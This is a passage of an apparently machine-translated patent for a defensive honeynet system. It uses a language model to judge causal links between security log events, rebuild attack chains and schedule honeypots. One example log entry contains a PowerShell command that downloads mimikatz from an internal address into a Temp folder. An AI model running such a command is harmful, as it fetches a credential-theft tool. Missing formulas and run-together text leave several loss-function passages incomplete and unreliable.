[0188] Context:"SystemlogfromHostCat14:30:05showsthe'systemd'servicesuccessfullyrestartingthe'nginx'processduetoaroutineconfigurationupdate.Concurrently,thecentralauthenticationlogserverreportsafailedKerberosauthenticationattemptforuser'admin'originatingfromsourceHostBat14:30:08."
[0189] [event1]HostCrestartednginxprocess[ / event1]
[0190] [start] <non-causal>[end]
[0191] [event2]HostBfailedlogindetected[ / event2]
[0192] [SEP]
[0193] Context:"WindowsSecurityEventLogonHostA(EventID4688,ProcessCreation)showsuser'victim'launched'powershell.exe'.Thefullcommandlinerecordedforthiseventis'powershell.exe -ExecutionPolicyBypass-Command\"IEX(New-ObjectNet.WebClient).DownloadFile('http: / / 10.0.5.1 / tools / mimikatz.exe','C:\\Users\\victim\\AppData\\Local\\Temp\\m.exe')\"'."
[0194] [event1]HostAexecutedPowerShell[ / event1]
[0195] [start][MASK][end]
[0196] [event2]HostAdownloadedMimikatz[ / event2]
[0197] [SEP]
[0198] By using a carefully designed Prompt template, this embodiment aligns the complex causal identification task with the pre-training task of the pre-trained language model, transforming it into a context-based "cloze" task that the model excels at.
[0199] S32. Introduce a supervised contrastive learning mechanism to model the semantics of event pairs;
[0200] Furthermore, relying solely on the contextual information contained in the Prompt may be insufficient for the model to deeply understand the subtle semantic differences between event pairs. To learn more discriminative and distinguishable event pair representations, this embodiment introduces a supervised contrastive learning (SCL) mechanism as an auxiliary training task. Its core objective is to bring all event pairs with similar causal labels closer together in the vector space, while simultaneously pushing away all event pairs with dissimilar causal labels.
[0201] To train the model to learn a more causal discriminative representation space, it is first necessary to model the semantic representation of event pairs. Specifically, a fixed-dimensional vector representation for each event pair needs to be extracted from the output of a PLM (such as BERT, RoBERTa, or domain-tuned variants like SecBERT).
[0202] This embodiment introduces supervised contrastive loss (SupConLoss), which defines a loss ratio within a batch of data. This is the set of indexes for all query pairs in this batch. For a single query event pair... Semantic representation obtained through modeling This will serve as an anchor point, and the semantic representation of the dynamically retrieved set containing M positive examples based on this query event will be as follows: Similarly, a set containing N negative examples has the following semantic representation: The objective of the comparative loss is to maximize... With all The similarity with all The similarity. Its contrast loss. The definition is as follows:
[0203]
[0204] in:
[0205] sim(a,b) is the similarity function between a and b, and cosine similarity cos(a,b) is used for calculation here;
[0206] τ is a positive temperature hyperparameter. A smaller τ makes the model more sensitive to differences in similarity, thus focusing more on distinguishing those negative samples that are difficult to differentiate.
[0207] Molecular calculation anchor The similarity index is the sum of all its positive examples. The larger the value, the closer the anchor is to its class of samples in the representation space.
[0208] The denominator is used to calculate the anchor point. This is a normalization term summed with the similarity index of all examples (positive / negative).
[0209] Finally, the supervised comparison loss for the entire batch. Then it is defined as: By minimizing the loss function, the model is motivated to learn a semantic space in which all event pairs with similar causal attributes cluster together to form close clusters, and are far apart from clusters of dissimilar event pairs.
[0210] Further, by jointly training classification tasks and auxiliary contrastive learning tasks, end-to-end, multi-objective optimization of model parameters is achieved.
[0211] The final determination of causal relationships is achieved by predicting the token at the [MASK] position in the Prompt. The output layer of the PLM (usually an MLMHead) calculates the logits of each token in the vocabulary for the [MASK] position. Considering the task scenario of causal recognition, we only focus on two key target tokens, namely... <causal>and <non-causal>The Softmax function converts the target token's logits into normalized probabilities. (Loss function for classification tasks) The standard binary cross-entropy loss is defined as follows: .in, To predict the probability that the label of the query event pair is causal for the model; and This is the actual label of the query event pair (1 represents causality, 0 represents non-causality).
[0212] To simultaneously optimize the model's classification accuracy and semantic representation quality, this embodiment employs a joint training strategy. The classification loss is... And comparative loss We perform a weighted summation to construct the final total loss function that needs to be optimized: β is a weight hyperparameter used to balance the contributions of classification and contrastive learning tasks to model parameter updates.
[0213] Optimizing the total loss using standard optimization algorithms (such as AdamW) simultaneously optimizes the model's parameters towards two objectives: firstly, it needs to learn to accurately fill in blanks based on context (completing the classification task); secondly, it needs to learn to construct a clear semantic structure in the representation space, effectively distinguishing between causal and non-causal event pairs. During the inference phase, for new query event pairs, the prediction is based on the [MASK] token position. <causal>and <non-causal>The probability of a relationship being causal or non-causal can be used to make a final judgment.
[0214] S33. Gene-based causal discriminant output mechanism;
[0215] After fine-tuning the model in S32 above, and considering the application requirements of actual deployment scenarios, this invention uses natural language generation to generate reasoning answers for the query event pairs introduced in the prompt template to output causal discrimination results.
[0216] Specifically, this embodiment employs a keyword-driven heuristic classification mechanism to parse the model output and determine whether a causal relationship exists between the event pairs. The system first defines a set of positive causal indicator words (such as "caused," "because," "therefore," "causal relationship," "triggered," etc.) and a set of non-causal indicator words (such as "irrelevant," "did not cause," "no causal relationship," "coincidentally occurred," etc.). After the language model generates a response, the system automatically traverses the text. If a positive causal indicator word is matched, the event pair is marked as having a causal relationship; if a negative indicator word is matched, it is marked as having no causal relationship. If neither type of word triggers a causal relationship, the "undetermined" label is output.
[0217] This mechanism has advantages such as simple implementation, no additional training required, and rapid deployment on the inference engine of edge honeypots or honey array decision modules. It is especially suitable for enhancing the existing attack chain construction capability in a rule-based manner and improving the efficiency and interpretability of causal inference in the honey array system.
[0218] S4. Reconstruct the causal-driven attack chain, and establish a linkage mechanism between the reconstructed attack chain and the honey array strategy module;
[0219] After determining the causal relationship between events, this embodiment further extends the micro-level causal dependency to a macro-level attack chain reconstruction process, and establishes a direct linkage mechanism with the honeycomb strategy module through this chain. The technical goal of this stage is to reorganize discrete security events into a causally consistent link structure in the semantic space, and then map it into executable strategy units for honeycomb scheduling and deployment.
[0220] S41. Construction of Causal Attack Chain Graph
[0221] First, in this embodiment, the causal event pairs output by S3 ( Mapping to directed edges, constructing a causal attack chain graph , where the node set For security incidents, edge collection This is a dependency relationship confirmed through causal reasoning. Through... Topology sorting and path search can generate multiple candidate attack chains. .
[0222] Furthermore, the model was further analyzed during the causal discrimination stage, using [MASK] fill-in-the-blank prediction. <causal> / <non-causal>The output normalized softmax probability value is assigned as the causal edge weight and used as the confidence score:
[0223]
[0224] The causal confidence score is calculated using a probabilistic modeling approach based on the language model output: Let the candidate event pairs be... Its causality is determined by the prediction scores of the pre-trained language model at the [MASK] position for the labels "causal" and "non-causal," denoted as […]. and The two factors are transformed into non-negative weights using an exponential function, and then normalized to obtain the final probability distribution. `exp()` represents the exponential function; the numerator measures the strength of whether the event pair is considered causal in the model, and the denominator is the total strength normalization term for both causal and non-causal categories, ensuring the result ranges from [0,1]. A value close to 1 indicates that the model is highly confident. yes The probability value not only preserves the causal directionality but also provides measurable edge weights for constructing subsequent attack chain graphs, making the generated attack paths interpretable and statistically reliable. This probability reflects the strength of the model's semantic understanding of the causal relationship between the two.
[0225] S42. Mapping from causal chain to honeycomb strategy graph; Based on the verified attack chain, this embodiment further constructs a policy graph, the core of which is to realize the mapping of "causal chain node ↔ honeycomb resource":
[0226] Corresponding lateral movement event chain (e.g.) This is mapped to the need to deploy cross-host high-interaction honeypots and simulate SMB services;
[0227] The corresponding credential theft and domain controller penetration chain (such as T1558KerberosTGTforging) is mapped to a strategy of scheduling domain controller emulation honeypots and enabling Kerberos traffic redirection.
[0228] The corresponding data transmission chain is mapped to the deployment of data trapping (honeyhole) and external traffic monitoring strategies.
[0229] In this process, the objective function used in this embodiment is:
[0230]
[0231] in, Indicates the confidence level of causality. For resource expenditure, For the purpose of trapping profits, Adaptive weights are used. The optimal strategy that maximizes the objective function value is found. The system can balance resource utilization and trapping efficiency while ensuring the correctness of the attack chain logic.
[0232] S43. Strategy encapsulation and distribution methods;
[0233] After mapping the causal attack chain to the strategy graph, this embodiment needs to transform the abstract optimization results into a deployment instruction set that the honeycomb execution layer can directly run, thereby achieving real-time linkage driven by causal reasoning. This process consists of four steps: strategy abstraction and encapsulation, formatting conversion, instruction issuance, and execution feedback.
[0234] ①Strategy Unit Abstraction:
[0235] First, according to the optimal strategy The corresponding attack chain From the event nodes and causal edges in the data, we can abstract the strategy requirement unit. ,in:
[0236] R represents the required resources (such as high-interaction honeypots, simulated protocol services, and data decoys).
[0237] A represents the corresponding action (such as instance deployment, traffic redirection, decoy mounting);
[0238] C represents constraints (such as deployment location, latency limits, and induced priority). This abstraction process ensures that the strategy is transformed from the semantic layer of the causal chain into a measurable and schedulable execution unit.
[0239] ② Standardized packaging
[0240] After the strategy unit is abstracted, this embodiment converts it into a standardized description language. This description language uses JSON / YAML format and defines uniform fields, such as:
[0241] order_id:trace_12345
[0242] timestamp:2025-09-02T02:00:00Z
[0243] actions:
[0244] -type:deploy_honeypot
[0245] params:
[0246] OS: "Windows Server 2019"
[0247] services:["SMB","Kerberos"]
[0248] location:"segment_10.20.25.0 / 24"
[0249] resource_limit:2
[0250] -type:sdn_redirect
[0251] params:
[0252] flow_match:"dst_port=445
[0253] redirect_to:"honeypot_id=hp_001"
[0254] -type:honeyvault_config
[0255] params:
[0256] dataset:"FinanceDocs_2023"
[0257] access_mode:"read-only"
[0258] constraints:
[0259] latency_threshold: 200ms
[0260] priority:high
[0261] This unified format facilitates cross-platform API calls and also makes subsequent auditing and tracing easier.
[0262] ③ Instruction Issuance
[0263] Formatted work orders are pushed to the honeycomb execution layer via a message bus (such as Kafka). The distribution mechanism employs transactional guarantees.
[0264] The work order is broken down into several atomic operations, and each atomic operation has an execution log.
[0265] The system employs a two-phase commit protocol (2PC) to ensure that work orders are executed consistently across multiple components (Honey Point, Honey Garden, SDN controller);
[0266] If any step fails, the rollback logic is triggered to restore the honeycomb array to the previous stable state, thus preventing the honeycomb array from becoming ineffective due to deployment failure.
[0267] ④ Execution feedback and closed-loop control:
[0268] After the instruction is executed, each operation will generate a receipt message, including:
[0269] Success / failure status codes;
[0270] Deployment instance identifiers (honeypot_id, gateway_id, etc.);
[0271] Actual resource consumption and latency data, etc.;
[0272] Feedback information is uniformly aggregated into the causal identification subsystem, which is used to verify whether the strategy execution is consistent with the causal chain prediction, update the resource status table and causal knowledge base, and support the parameter optimization of the next round of causal identification and strategy generation.
[0273] The key point of this invention lies in the deep integration of causal reasoning mechanisms with honeycomb architecture. Through contextual comparison learning and Prompt example guidance, it achieves efficient identification of causal relationships in security events, and further drives attack chain reconstruction and policy linkage. Compared with existing technologies, this invention has substantial innovation and differences in the following aspects:
[0274] First, in terms of causal identification modeling paradigm, this invention breaks through the existing "relevance reasoning" methods based on rule bases or time statistics, and proposes a contextual semantic reasoning mechanism based on a pre-trained language model. By dynamically injecting positive and negative example instances into the Prompt and combining it with supervised contrastive learning constraints, this invention can directly distinguish the causal attributes of event pairs, rather than indirectly relying on temporal or co-occurrence features. This semantically driven modeling approach not only improves recognition accuracy but also significantly enhances the model's ability to suppress spurious causality.
[0275] Secondly, regarding the semantic representation and structural modeling of event pairs, this invention differs from existing technologies that treat events as independent nodes or time series points. It employs event triple abstraction and difference vector modeling to directly learn the causal relationship representation between event pairs. Simultaneously, through a contrastive learning mechanism, similar causal event pairs are aggregated in the semantic space, while dissimilar event pairs are separated, thereby constructing a vector space with causal discriminative power. This direct modeling of relational attributes enables this invention to more accurately capture subtle semantic dependencies within attack chains.
[0276] Furthermore, regarding unified modeling and Prompt construction for heterogeneous data, this invention proposes a unified Prompt template strategy. This strategy transforms heterogeneous events from multiple sources, such as system logs, traffic data, and command sequences, into natural language expressions and embeds them into templates. This avoids the problem of designing complex parsers and fusion processes for different data sources, as is common in existing methods. This technique enables unified processing of multimodal security events, allowing honeycombs to obtain consistent causal inference results even in cross-host, multi-stage attack scenarios.
[0277] Finally, regarding the ability to proactively combat false causality and policy linkage, this invention introduces a controllable sampling and counterfactual example construction mechanism to systematically generate event pairs that are difficult to distinguish, such as those with logical conflicts and cross-stage jumps, effectively avoiding misjudgments during model training. Simultaneously, this invention directly maps causal identification results to the honeycomb strategy graph and generates executable work orders through resource constraints and reward functions, thus establishing a closed loop of "causal identification—attack chain reconstruction—policy scheduling." This linkage mechanism differs from existing technologies that only focus on causal identification or source tracing analysis, endowing the honeycomb system with real-time scheduling and proactive intervention capabilities.
[0278] In summary, the key points and protected aspects of this invention are reflected in the causal reasoning paradigm, event pair representation mechanism, unified Prompt construction strategy, and closed-loop capability of causal results to strategy linkage. These all adopt innovative methods that are different from existing technologies. This not only solves the shortcomings of existing methods in terms of generalization, accuracy, and practicality, but also provides core technical support for the honeycomb active defense system that is embeddable, interpretable, and executable.
[0279] Obviously, the above embodiments are merely illustrative examples for clear explanation and are not intended to limit the implementation. Those skilled in the art will recognize that other variations or modifications can be made based on the above description. It is neither necessary nor possible to exhaustively list all possible implementations here. However, obvious variations or modifications derived therefrom are still within the scope of protection of this invention. < / causal> < / causal> < / causal> < / causal> < / causal> < / causal> < / causal> < / causal> < / causal> < / causal> < / causal> < / causal> < / causal>
Claims
1. A causal-driven method for reconstructing honeycomb attack chains and linking strategies, characterized in that, Includes the following steps: S1. Model the security event pairs of the honeycomb array. By unifying the structure of the raw data, construct the event triple expression model, mine event pairs with potential causal relationships, and output them. S2. Construct a sample library. Guide the construction of the sample library through causal examples. The causal examples include positive causal event pairs extracted from the real attack chains mined in S1 and non-causal negative examples constructed through adversarial design. Cooperate with downstream model inference tasks to achieve synergistic optimization of context alignment, semantic comparison and structural generalization capabilities. S3. Construct a prompt for causal event pairs, determine causal relationships through analogical reasoning using a large model, and make predictions and outputs based on the generated causal relationships; S4. Reconstruct the causal attack chain and establish a linkage mechanism between the reconstructed attack chain and the honey array strategy module.
2. The causal-driven honeycomb attack chain reconstruction and strategy linkage method according to claim 1, characterized in that, S1 includes the following steps: S11. Construct a structured representation model for security events. This structured representation model uses an event triple modeling paradigm to represent the semantic core of network security events. The event triple modeling paradigm is expressed as follows: Where S represents Subject, which is the initiator of the event; A represents Action, which is the type of action performed by the event; and O represents Object, which is the target object affected or acted upon by the action. S12. Establish a query event pair construction mechanism to filter out event pairs with potential causal relationships from independent events and output them. The event pairs are represented as follows: And satisfy at least one of the following constraints, said constraints include: Time window constraint: Two events must satisfy the time constraint. ,in A configurable window threshold is used to control the time span of the event causal chain; Host / session consistency constraint: If two events occur on the same host or in the same session, the pair is retained. Resource dependency constraints: If or This indicates that the output of the previous event becomes the input of the next event, indicating a potential data flow dependency. Topology path constraints: Supports forwarding relationships based on attack chain paths in cross-host scenarios, such as honeypots forming connections through honeycombs, which allows the construction of cross-node event pairs.
3. The causal-driven honeycomb attack chain reconstruction and strategy linkage method according to claim 1, characterized in that, S2 includes: S21. Establish a sample source and generation mechanism, and encode the input samples into natural language form after standardizing template mapping, and inject them into the language model reasoning process as contextual guidance prompts. S22. Establish a positive and negative example construction strategy, wherein the positive and negative example construction strategy includes a positive example construction strategy and a negative example construction strategy, and each pair of positive and negative examples is represented as a natural language fragment through a unified encoding template. S23. Establish a dynamic retrieval and sample matching mechanism, introduce an example cache pool, and implement dynamic sample retrieval by adopting a high-dimensional embedding vector matching strategy, specifically including: Use a language model encoder to vectorize query event pairs; Perform semantic vector nearest neighbor retrieval in the cache pool; M positive examples and N negative examples are selected based on semantic similarity to construct a context Prompt; Inject the current inference request to achieve context alignment and analogy guidance.
4. The causal-driven honeycomb attack chain reconstruction and strategy linkage method according to claim 1, characterized in that, S3 includes: S31. Establish a Prompt template structure, unifying structured event pairs and dynamically retrieved example samples into a text sequence adapted to the input format of the pre-trained language model, specifically including: The event to be queried And M positive examples retrieved from the cache pool , and N negative examples , Construct the input sequence according to the template T(x), where Where [CLS] represents a special start marker and [SEP] represents a special separator marker. , and These are sequences of positive and negative examples and query event pairs that follow the same sub-template. The symbols indicate that each special marker is concatenated with each sequence segment; The sub-template includes text sequences of the following form: Context: Describes the complete context information of the occurrence of the two events; [event1]Natural Language Description of Event E1[ / event1] [start] <causal>or <non-causal> Or [MASK][end]; < / causal> [event2]Natural Language Description of Event E2[ / event2] in: Context: Provides a more comprehensive context describing the occurrence of an event; [event1],[ / event1] and [ / event2],[event2]: Special tokens are introduced to highlight the start and end of event pairs. These two sets of tokens contain natural language descriptions of the first and second event triplets obtained from the first stage transformation. [start], [end]: Special tokens introduced to indicate the start and end of the "cloze test"; <causal> , <non-causal> [MASK]: A label used to indicate whether a causal relationship exists between pairs of events; < / causal> S32. Introduce a supervised contrastive learning mechanism to model the semantics of event pairs, including: First, vector representations of event pairs are extracted from the output of PLM. Then, a supervised contrastive loss is introduced to incentivize the model to learn a semantic space. Within this semantic space, event pairs with similar causal attributes cluster together to form a tight cluster, which is far away from the clusters of dissimilar event pairs. Furthermore, by jointly training classification tasks and auxiliary contrastive learning tasks, end-to-end multi-objective optimization of model parameters is achieved. Finally, the causal relationship is determined by predicting the token at the [MASK] position in the Prompt. S33. Establish a generative causal discrimination output mechanism. For query event pairs introduced in the prompt template, use natural language generation to generate reasoning answers to output causal discrimination results.
5. The causal-driven honeycomb attack chain reconstruction and strategy linkage method according to claim 4, characterized in that, S4 includes: S41. Construction of the causal attack chain graph, including: The causal event pairs output by S3 ( Mapping to directed edges, constructing a causal attack chain graph G= Where the node set V represents security events and the edge set E represents dependencies confirmed through causal reasoning, multiple candidate attack chains are generated by performing topological sorting and path search on the G. The model is extracted during the causal discrimination stage, and predictions are made through [MASK] fill-in-the-blank. <causal> / <non-causal> The output normalized softmax probability value is assigned as the causal edge weight and used as the confidence score: < / causal> ; Let the candidate event pairs be . Its causality is determined by the prediction scores of the pre-trained language model for causal and non-causal labels at the [MASK] position, denoted as […]. and The two are transformed into non-negative weights by an indicator function, and then normalized to obtain the final probability distribution, where exp() represents the exponential function; S42. Establish a mapping from the causal chain to the honeypot strategy graph, where the corresponding lateral movement event chain is mapped to the requirement of deploying cross-host high-interaction honeypots and simulating SMB services, the corresponding credential theft and domain controller penetration chain is mapped to scheduling domain controller simulation honeypots and enabling Kerberos traffic guidance strategy, and the corresponding data outgoing chain is mapped to deploying data trapping and external traffic monitoring strategy. The mapping process uses an objective function: ; in Indicates the confidence level of causality. For resource expenditure, For the purpose of trapping profits, For adaptive weights, To target the attack chain Mapping strategy; S43. By using strategy encapsulation and distribution methods, the abstract optimization results are transformed into a set of deployment instructions that can be directly run by the honeycomb execution layer, thereby realizing real-time linkage driven by causal reasoning. The strategy encapsulation and distribution methods include strategy unit abstraction, standardized encapsulation, instruction distribution, and execution feedback and closed-loop control. According to the optimal strategy The corresponding attack chain Abstracting strategy units from event nodes and causal edges in the data. Where R represents the required resources, A represents the corresponding action, and C represents the constraints; Standardized encapsulation refers to converting the strategy unit into a standardized description language after the abstraction is completed. The standardized description language is expressed in JSON / YAML format and defines uniform fields. The instruction issuance refers to the formatted work order being pushed to the honeycomb execution layer via the message bus. The issuance mechanism adopts transactional guarantee, wherein the work order is broken down into several atomic operations, each of which has an execution log, and the work order adopts a two-phase commit protocol. If any part fails, the rollback logic is triggered to restore to the previous stable state. The execution feedback and closed-loop control refer to the generation of receipt information for each operation after the instruction is executed. The receipt information includes a success or failure status code, a deployment example identifier, and actual resource consumption and latency data.
6. The causal-driven honeycomb attack chain reconstruction and strategy linkage method according to claim 3, characterized in that: The positive example construction strategy mentioned in S22 includes positive strategy one, positive strategy two, and positive strategy three; The first positive strategy is explicit causal extraction, which extracts fragments containing causal prompts from CTI or security reports and converts them into event pairs. The second positive strategy is: TTP sequence instantiation matching, which uses structured attack knowledge base to generate weakly labeled data; The third positive strategy is to use the counterfactual dependency criterion to uncover the structural logic in the attack chain that if the preceding event has not occurred, the subsequent event is unreachable, and to construct positive example pairs with strong causal orientation.
7. The causal-driven honeycomb attack chain reconstruction and strategy linkage method according to claim 3, characterized in that: The negative example construction strategy in S22 includes negative strategy one, negative strategy two, negative strategy three, negative strategy four, and negative strategy five; The negative strategy one is: time co-occurrence but no logical relationship, select event pairs in the log that occur closely in time but belong to different business logics or system activities; The second negative strategy is to select logically independent event pairs within the same entity for undependent event pairs under the same entity. The third negative strategy is to identify a combination of events that conflict with the preceding and following objectives due to behavioral logic conflicts. The negative strategy four: Independent events under a common triggering source, select two independent subsequent events triggered by a common initial event; The fifth negative strategy is to select two logically non-adjacent events belonging to different attack stages from a known multi-stage attack chain to form a negative example.
8. The causal-driven honeycomb attack chain reconstruction and strategy linkage method according to claim 4, characterized in that, The supervised contrastive learning mechanism described in S33 includes: Define within a batch of data For the set of indexes for all query pairs in this batch, the semantic representation for a single query event is: And the aforementioned Using this query event as an anchor point, the semantic representation of the dynamically retrieved set containing M positive examples is as follows: Similarly, a set containing N negative examples has the following semantic representation: The objective of the comparison loss is to maximize With all The similarity with all The similarity and its contrast loss The definition is as follows: in: sim(a,b) is the similarity function between a and b, which is calculated using cosine similarity cos(a,b); τ is a positive temperature coefficient hyperparameter; Molecular calculation anchor The sum of similarity indices with all its positive examples; The denominator is used to calculate the anchor point. The sum of similarity indices with all examples; Supervised comparison loss of the entire batch Then it is defined as: ; Where I is defined above. This refers to the set of indexes for all query pairs in this batch.
9. The causal-driven honeycomb attack chain reconstruction and strategy linkage method according to claim 8, characterized in that, The process for determining the causal relationship includes: The log-probability of each token in the vocabulary is calculated using the [MASK] position in the PLM output layer, and then considered in conjunction with the task scenario of causal recognition. <causal>and <non-causal> The two key target tokens are processed by the Softmax function to transform the log odds of the target tokens into normalized probabilities.< / non-causal> < / causal> The loss function for the classification task Using the standard binary cross-entropy loss, it is defined as: ; in, To predict the probability that the label of the query event pair is causal for the model; and This refers to the actual label of the query event pair, where 1 represents causality and 0 represents non-causality; A joint training strategy is employed to optimize the model's classification accuracy and semantic representation quality, and the classification loss is... And comparative loss We perform a weighted summation to construct the final total loss function that needs to be optimized: , where β is a weight hyperparameter used to balance the contributions of classification tasks and contrastive learning tasks in model parameter updates; By optimizing the total loss using the AdamW optimization algorithm, the model's parameters will be optimized towards two objectives simultaneously: firstly, to accurately fill in the blanks based on the context, and secondly, to construct a clear semantic structure in the representation space to distinguish between causal and non-causal events. During the inference phase, for a new query event pair, the token at the [MASK] position is predicted as follows: <causal>and <non-causal> The probability of a relationship being causal or non-causal is used to make the final judgment.< / non-causal> < / causal>